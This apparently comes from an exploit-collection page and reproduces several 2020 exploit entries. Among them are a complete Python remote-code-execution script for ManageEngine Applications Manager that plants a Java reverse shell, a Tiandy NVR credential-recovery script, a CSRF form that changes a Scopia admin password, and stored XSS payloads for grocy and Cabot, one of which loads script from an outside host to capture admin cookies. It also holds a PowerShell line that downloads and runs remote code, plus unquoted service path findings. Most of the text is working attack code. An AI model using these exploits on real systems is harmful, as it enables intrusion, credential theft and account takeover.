HireHackking

# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path # Discovery Date: 2020-09-03 # Discovery by: chipo # Vendor Homepage: https://nordvpn.com # Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe # Tested Version: 6.31.13.0 # Tested on OS: Windows 10 Pro x64 es # Vulnerability Type: Unquoted Service Path # Find the discover Unquoted Service Path Vulnerability: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """ nordvpn-service nordvpn-service C:\Program Files\NordVPN\nordvpn-service.exe # Service info: C:\>sc qc servicio [SC] QueryServiceConfig SUCCESS NOMBRE_SERVICIO: nordvpn-service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\NordVPN\nordvpn-service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : nordvpn-service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.

# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path # Discovery Date: 2020-09-08 # Discovery by: Alan Lacerda (alacerda) # Vendor Homepage: https://www.sharemouse.com/ # Software Link: https://www.sharemouse.com/ShareMouseSetup.exe # Version: 5.0.43 # Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041 PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); PS > Invoke-AllChecks ServiceName : ShareMouse Service Path : C:\Program Files (x86)\ShareMouse\smService.exe StartName : LocalSystem AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath> PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName AcceptStop DisplayName PathName StartName TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem #Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

#!/usr/bin/python3 # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) # Google Dork: None # Date: 2020-09-04 # Exploit Author: Hodorsec # Vendor Homepage: https://manageengine.co.uk # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html # Software Link: http://archives.manageengine.com/applications_manager/14720/ # Version: Until version 14720 # Tested on: version 12900 and version 14700 # CVE : CVE-2020-14008 # Summary: # POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers # Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor # When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method # Vulnerable code: # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java # 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception { # 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader(); # 131 /* */ try { # 132 /* 132 */ boolean setcredentials = false; # 133 /* 133 */ String url = "t3://" + hostname + ":" + portString; # 134 /* 134 */ JarLoader jarLoader = null; # 135 /* */ # ....<SNIP>.... # 143 /* */ } # 144 /* 144 */ else if (version == 8) # 145 /* */ { # 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists()) # 147 /* */ { # 148 /* */ # 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar"); # 150 /* */ # ....<SNIP>.... # 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader); # 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment"); # 172 /* 172 */ Object env = cls.newInstance(); # Example call for MAM version 12900: # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar # [*] Visiting page to retrieve initial cookies... # [*] Retrieving admin cookie... # [*] Getting base directory of ManageEngine... # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12 # [*] Creating JAR file... # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # added manifest # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%) # [*] Uploading JAR file... # [*] Attempting to upload JAR directly to targeted Weblogic folder... # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function! # [*] Running the Weblogic credentialtest which triggers the code in the JAR... # [*] Check your shell... # Function flow: # 1. Get initial cookie # 2. Get valid session cookie by logging in # 3. Get base directory of installation # 4. Generate a malicious JAR file # 5. Attempt to directly upload JAR, if success, jump to 7 # 6. Create task with random ID to copy JAR file to expected Weblogic location # 7. Execute task # 8. Delete task for cleanup # 9. Run the vulnerable credentialTest, using the malicious JAR import requests import urllib3 import shutil import subprocess import os import sys import random import re from lxml import html # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def get_initial_cookie(url,headers): print("[*] Visiting page to retrieve initial cookies...") target = url + "/index.do" r = requests.get(target,headers=headers,timeout=timeout,verify=False) return r.cookies def get_valid_cookie(url,headers,initial_cookies,usern,passw): print("[*] Retrieving admin cookie...") appl_cookie = "JSESSIONID_APM_9090" post_data = {'clienttype':'html', 'webstart':'', 'j_username':usern, 'ScreenWidth':'1280', 'ScreenHeight':'709', 'username':usern, 'j_password':passw, 'submit':'Login'} target = url + "/j_security_check" r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False) res = r.text if "Server responded in " in res: return r.cookies else: print("[!] No valid response from used session, exiting!\n") exit(-1) def get_base_dir(url,headers,valid_cookie): print("[*] Getting base directory of ManageEngine...") target = url + "/common/serverinfo.do" params = {'service':'AppManager', 'reqForAdminLayout':'true'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) tree = html.fromstring(r.content) pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title') base_dir = pathname[0] print("[*] Found base directory: " + base_dir) return base_dir def create_jar(command,jarname,revhost,revport): print("[*] Creating JAR file...") # Variables classname = "Environment" pkgname = "weblogic.jndi" fullname = pkgname + "." + classname manifest = "MANIFEST.MF" # Directory variables curdir = os.getcwd() metainf_dir = "META-INF" maindir = "weblogic" subdir = maindir + "/jndi" builddir = curdir + "/" + subdir # Check if directory exist, else create directory try: if os.path.isdir(builddir): pass else: os.makedirs(builddir) except OSError: print("[!] Error creating local directory \"" + builddir + "\", check permissions...") exit(-1) # Creating the text file using given parameters javafile = '''package ''' + pkgname + '''; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; import java.util.concurrent.TimeUnit; public class ''' + classname + ''' { // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance() public void setProviderUrl(String string) throws Exception { System.out.println("Hello from setProviderUrl()"); connect(); } // Normal main() entry public static void main(String args[]) throws Exception { System.out.println("Hello from main()"); // Added delay to notice being called from main() TimeUnit.SECONDS.sleep(10); connect(); } // Where the magic happens public static void connect() throws Exception { String host = "''' + revhost + '''"; int port = ''' + str(revport) + '''; String[] cmd = {"''' + command + '''"}; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } }''' # Output file to desired directory os.chdir(builddir) print(javafile,file=open(classname + ".java","w")) # Go to previous directory to create JAR file os.chdir(curdir) # Create the compiled .class file cmdCompile = "javac --release 7 " + subdir + "/*.java" process = subprocess.call(cmdCompile,shell=True) # Creating Manifest file try: if os.path.isdir(metainf_dir): pass else: os.makedirs(metainf_dir) except OSError: print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...") exit(-1) print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w")) # Create JAR file cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class" process = subprocess.call(cmdJar,shell=True) # Cleanup directories try: shutil.rmtree(metainf_dir) shutil.rmtree(maindir) except: print("[!] Error while cleaning up directories.") return True def upload_jar(url,headers,valid_cookie,jarname,rel_path): print("[*] Uploading JAR file...") target = url + "/Upload.do" path_normal = './' path_trav = rel_path jar = {'theFile':(jarname,open(jarname, 'rb'))} print("[*] Attempting to upload JAR directly to targeted Weblogic folder...") post_data = {'uploadDir':path_trav} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) res = r_upload.text if "successfully uploaded" not in res: print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...") post_data = {'uploadDir':path_normal} jar = {'theFile':(jarname,open(jarname, 'rb'))} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) return "normal_path" else: print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!") return "trav_path" def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir): print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...") valid_resp = "Execute Program succesfully created." target = url + "/adminAction.do" post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null', 'method':'createExecProgAction', 'id':'0', 'displayname':action_name, 'serversite':'local', 'choosehost':'-2', 'prompt':'$', 'command':'move weblogic.jar ' + rel_path, 'execProgExecDir':work_dir, 'abortafter':'10', 'cancel':'false'} r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text found_id = "" if action_name in res: tree = html.fromstring(r.content) actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick') actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()') i = 0 for name in actionnames: for url in actionurls: if action_name in name: found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1) print("[*] Found actionname: " + action_name + " with found actionid " + found_id) break i+=1 return found_id else: print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.") exit(-1) def exec_task(url,headers,valid_cookie,found_id): print("[*] Executing created task with id: " + found_id + " to copy JAR...") valid_resp = "has been successfully executed" target = url + "/common/executeScript.do" params = {'method':'testAction', 'actionID':found_id, 'haid':'null'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text if valid_resp in res: print("[*] Task " + found_id + " has been executed successfully") else: print("[!] Task not executed. Check requests, exiting...") exit(-1) return def del_task(url,headers,valid_cookie,found_id): print("[*] Deleting created task as JAR has been copied...") target = url + "/adminAction.do" params = {'method':'deleteProgExecAction'} post_data = {'haid':'null', 'headercheckbox':'on', 'progcheckbox':found_id} r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) def run_credtest(url,headers,valid_cookie): print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...") target = url + "/testCredential.do" post_data = {'method':'testCredentialForConfMonitors', 'serializedData':'url=/jsp/newConfType.jsp', 'searchOptionValue':'', 'query':'', 'addtoha':'null', 'resourceid':'', 'montype':'WEBLOGIC:7001', 'isAgentEnabled':'NO', 'resourcename':'null', 'isAgentAssociated':'false', 'hideFieldsForIT360':'null', 'childNodesForWDM':'[]', 'csrfParam':'', 'type':'WEBLOGIC:7001', 'displayname':'test', 'host':'localhost', 'netmask':'255.255.255.0', 'resolveDNS':'False', 'port':'7001', 'CredentialDetails':'nocm', 'cmValue':'-1', 'version':'WLS_8_1', 'sslenabled':'False', 'username':'test', 'password':'test', 'pollinterval':'5', 'groupname':''} print("[*] Check your shell...") requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False) return # Main def main(argv): if len(sys.argv) == 6: url = sys.argv[1] usern = sys.argv[2] passw = sys.argv[3] revhost = sys.argv[4] revport = sys.argv[5] else: print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>") print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n") exit(0) # Do stuff try: # Set HTTP headers headers = http_headers() # Relative path to copy the malicious JAR file rel_path = "classes/weblogic/version8/" # Generate a random ID to use for the task name and task tracking random_id = str(random.randrange(0000,9999)) # Action_name used for displaying actions in overview action_name = "move_weblogic_jar" + random_id # Working dir to append to base dir base_append = "\\working\\" # Name for JAR file to use jarname = "weblogic.jar" # Command shell to use cmd = "cmd.exe" # Execute functions initial_cookies = get_initial_cookie(url,headers) valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw) work_dir = get_base_dir(url,headers,valid_cookie) + base_append create_jar(cmd,jarname,revhost,revport) status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path) # Check if JAR can be uploaded via Directory Traversal # If so, no need to add and exec actions; just run the credentialtest directly if status_jar == "trav_path": run_credtest(url,headers,valid_cookie) # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest elif status_jar == "normal_path": found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir) exec_task(url,headers,valid_cookie,found_id) del_task(url,headers,valid_cookie,found_id) run_credtest(url,headers,valid_cookie) except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + e) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + e.code + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:])

# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting # Date: 2020-09-06 # Exploit Author: Mufaddal Masalawala # Vendor Homepage: https://berrnd.de/ # Software Link: https://github.com/grocy/grocy # Version: 2.7.1 # Tested on: Kali Linux 2020.3 # Proof Of Concept: grocy household management solution v2.7.1, allows stored XSS and HTML Injection, via Create Shopping List module, that is rendered upon deletiing that Shopping List. To exploit this vulnerability: 1. Login to the application 2. Go to 'Shooping List' module 3. Click on 'New Shopping List' module 4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name' input field. 5. Click Save 6. Click 'Delete Shopping List' *#REQUEST -->* POST /api/objects/shopping_lists HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/shoppinglist/new Content-type: application/json Content-Length: 38 Connection: close Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd {"name":"<marquee onstart=alert(1)> "} *#RESPONSE -->* HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 06 Sep 2020 12:53:13 GMT Content-Type: application/json Connection: close X-Powered-By: PHP/7.3.21 Content-Length: 26 {"created_object_id":"21"} Regards, Mufaddal M

# Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting # Date: 2020-09-06 # Exploit Author: Abhiram V # Vendor Homepage: https://cabotapp.com/ # Software Link: https://github.com/arachnys/cabot # Version: 0.11.12 # Tested on: Ubuntu Linux ############################################################################ Introduction Cabot is a free, open-source, self-hosted infrastructure monitoring platform that provides some of the best features of PagerDuty, Server Density, Pingdom and Nagios without their cost and complexity.It provides a web interface that allows us to monitor services and send telephone, sms or hipchat/email alerts to your on-duty team if those services start misbehaving or go down . ############################################################################ XSS details: Blind XSS ############################################################################ Executing Blind XSS in New Instances leads to admin account takeover URL http://127.0.0.1:5000/instance/create/ PAYLOAD "><script src=https://anonart.xss.ht></script> *payload from xsshunter.com platform for finding blind xss* PARAMETER Address column EXPLOITATION Create a user account under django administrator account and login as user to perform the attack Create a new instance and save the instances, Navigate to Services. Create a new Service from then input a Name and Url (for POC i used BlindXSS in both columns). Then append the admin account in Users to notify column and use status check and instances then save. Now the admin account gets a notification when the admin runs the check Blind XSS executes in background. when login to xsshunter.com we can see the screenshots cookies and all details of admin account IMPACT Stored XSS can be executed from any accounts and triggered in any accounts including django administration unknowingly by the victim (here it is admin) and compromise the accounts. Tested in both xsshunter.com and blindf.com Attacker can also use stored xss payloads here. ############################################################################

# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path # Discovery Date: 2020-09-08 # Response from Input Director Support: 09/09/2020 # Exploit Author: TOUHAMI Kasbaoui # Vendor Homepage: https://www.inputdirector.com/ # Version: 1.4.3 # Tested on: Windows Server 2012, Windows 10 # Find the Unquoted Service Path Vulnerability: C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ Input Director Service InputDirector C:\Program Files (x86)\InputDirector\IDWinService.exe Auto # Service info: C:\sc qc IDWinService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: InputDirector TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Input Director\IDWinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Input Director Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: A successful attempt to exploit this vulnerability could allow executing code during startup or reboot with the elevated privileges.

# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure # Date: 2020-09-10 # Exploit Author: zb3 # Vendor Homepage: http://en.tiandy.com # Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html # Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html # Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0 # Tested on: Linux # CVE: N/A # Requires Python 3 and PyCrypto # For more details and information on how to escalate this further, see: # https://github.com/zb3/tiandy-research import sys import hashlib import base64 import socket import struct from Crypto.Cipher import DES def main(): if len(sys.argv) != 2: print('python3 %s [host]' % sys.argv[0], file=sys.stderr) exit(1) host = sys.argv[1] conn = Channel(host) conn.connect() crypt_key = conn.get_crypt_key(65536) attempts = 2 tried_to_set_mail = False ok = False while attempts > 0: attempts -= 1 code = get_psw_code(conn) if code == False: # psw not supported break elif code == None: if not tried_to_set_mail: print("No PSW data found, we'll try to set it...", file=sys.stderr) tried_to_set_mail = True if try_set_mail(conn, 'a@a.a'): code = get_psw_code(conn) if code == None: print("couldn't set mail", file=sys.stderr) break rcode, password = recover_with_code(conn, code, crypt_key) if rcode == 5: print('The device is locked, try again later.', file=sys.stderr) break if rcode == 0: print('Admin', password) ok = True break if tried_to_set_mail: try_set_mail(conn, '') if not code: print("PSW is not supported, trying default credentials...", file=sys.stderr) credentials = recover_with_default(conn, crypt_key) if credentials: user, pw = credentials print(user, pw) ok = True if not ok: print('Recovery failed', file=sys.stderr) exit(1) def try_set_mail(conn, target): conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT']) resp = conn.recv_msg() return resp[4:7] == ['RESERVEPHONE', '2', '1'] def get_psw_code(conn): conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1']) resp = conn.recv_msg() if resp[4] != 'FINDPSW': return False psw_reg = psw_data = None if len(resp) > 7: psw_reg = resp[6] psw_data = resp[7] if not psw_data: return None psw_type = int(resp[5]) if psw_type not in (1, 2, 3): raise Exception('unsupported psw type: '+str(psw_type)) if psw_type == 3: psw_data = psw_data.split('"')[3] if psw_type == 1: psw_data = psw_data.split(':')[1] psw_key = psw_reg[:0x1f] elif psw_type in (2, 3): psw_key = psw_reg[:4].lower() psw_code = td_decrypt(psw_data.encode(), psw_key.encode()) code = hashlib.md5(psw_code).hexdigest()[24:] return code def recover_with_code(conn, code, crypt_key): conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT']) resp = conn.recv_msg() rcode = int(resp[6]) if rcode == 0: return rcode, decode(resp[8].encode(), crypt_key).decode() return rcode, None def recover_with_default(conn, crypt_key): res = conn.login_with_key(b'Default', b'Default', crypt_key) if not res: return False while True: msg = conn.recv_msg() if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']: return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode() ### ### lib/des.py ### def reverse_bits(data): return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data]) def pad(data): if len(data) % 8: padlen = 8 - (len(data) % 8) data = data + b'\x00' * (padlen-1) + bytes([padlen]) return data def unpad(data): padlen = data[-1] if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1): data = data[:-padlen] return data def encrypt(data, key): cipher = DES.new(reverse_bits(key), 1) return reverse_bits(cipher.encrypt(reverse_bits(pad(data)))) def decrypt(data, key): cipher = DES.new(reverse_bits(key), 1) return unpad(reverse_bits(cipher.decrypt(reverse_bits(data)))) def encode(data, key): return base64.b64encode(encrypt(data, key)) def decode(data, key): return decrypt(base64.b64decode(data), key) ### ### lib/binproto.py ### def recvall(s, l): buf = b'' while len(buf) < l: nbuf = s.recv(l - len(buf)) if not nbuf: break buf += nbuf return buf class Channel: def __init__(self, ip, port=3001): self.ip = ip self.ip_bytes = socket.inet_aton(ip)[::-1] self.port = port self.msg_seq = 0 self.data_seq = 0 self.msg_queue = [] def fileno(self): return self.socket.fileno() def connect(self): self.socket = socket.socket() self.socket.connect((self.ip, self.port)) def reconnect(self): self.socket.close() self.connect() def send_cmd(self, data): self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data) self.msg_seq += 1 def send_data(self, stream_type, data): self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data) self.data_seq += 1 def recv(self): hdr = recvall(self.socket, 20) if hdr[:4] == b'\xf1\xf5\xea\xf9': lsize, stream_type = struct.unpack('<14xHI', hdr) data = recvall(self.socket, lsize - 20) if data[:4] != b'NVS\x00': print(data[:4], b'NVS\x00') raise Exception('invalid data header') return None, [stream_type, data[8:]] elif hdr[:4] == b'\xf1\xf5\xea\xf5': lsize, dsize = struct.unpack('<6xH10xH', hdr) if lsize != dsize + 20: raise Exception('size mismatch') msgs = [] for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'): msg = msg.split('\t') if '.' not in msg[0]: msg = [self.ip] + msg msgs.append(msg) return msgs, None else: raise Exception('invalid packet magic: ' + hdr[:4].hex()) def recv_msg(self): if len(self.msg_queue): ret = self.msg_queue[0] self.msg_queue = self.msg_queue[1:] return ret msgs, _ = self.recv() if len(msgs) > 1: self.msg_queue.extend(msgs[1:]) return msgs[0] def send_msg(self, msg): self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode()) def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'): self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1']) resp = self.recv_msg() if resp[4:6] != ['LOGONFAILED', '3']: print(resp) raise Exception('unrecognized login response') crypt_key = base64.b64decode(resp[8]) return crypt_key def login_with_key(self, uname, pw, crypt_key): self.reconnect() hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest()) hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest()) self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1']) resp = self.recv_msg() if resp[4] == 'LOGONFAILED': return False self.msg_queue = [resp] + self.msg_queue return True def login(self, uname, pw): crypt_key = self.get_crypt_key(1, uname, pw) if not self.login_with_key(uname, pw, crypt_key): return False return crypt_key ### ### lib/crypt.py ### pat = b'abcdefghijklmnopqrstuvwxyz0123456789' def td_asctonum(code): if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ': code += 0x20 if code not in pat: return None return pat.index(code) def td_numtoasc(code): if code < 36: return pat[code] return None gword = [ b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC', b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta', b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC', b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH', b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt', b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ', b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX', b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1', b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ', b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5', b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG', b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI', b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB', b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb', b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs', b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh', b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX', b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW', b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq', b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU', b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe', b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG', b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1', b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm', b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c', b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5', b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK', b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s', b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR', b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb', b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS', b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54', b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ', b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx', b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ', b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg' ] def td_decrypt(data, key): kdx = 0 ret = [] for idx, code in enumerate(data): while True: if kdx >= len(key): kdx = 0 kcode = key[kdx] knum = td_asctonum(kcode) if knum is None: kdx += 1 continue break if code not in gword[knum]: return None cpos = gword[knum].index(code) ret.append(td_numtoasc(cpos)) kdx += 1 return bytes(ret) if __name__ == '__main__': main()

# Exploit Title: Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password) # Google Dork: inurl:scopia+index.jsp # Date: 2020-09-09 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://avaya.com # Software Link: https://support.avaya.com/downloads/download-details.action?contentId=C201772012204170_4&productId=P1605 # Version: 8.3.915.4 # Tested on: Windows 10 Pro # CVE : N/A # PoC: https://github.com/V1n1v131r4/Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 # CSRF to change admin password # The admin password will be changed to "attacker" <!DOCTYPE html> <html> <body> <form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp"> <input type="text" name="JSESSIONID" value=""> <input type="text" name="newadminusername" value=""> <input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C"> <input type="text" name="newenablext1000meetingpin" value="false"> <input type="text" name="newxt1000meetingpin" value="EB8169F43227957C"> <input type="text" name="checkstatus" value="true"> <input type="submit" value="Send"> </form> </body> </html>

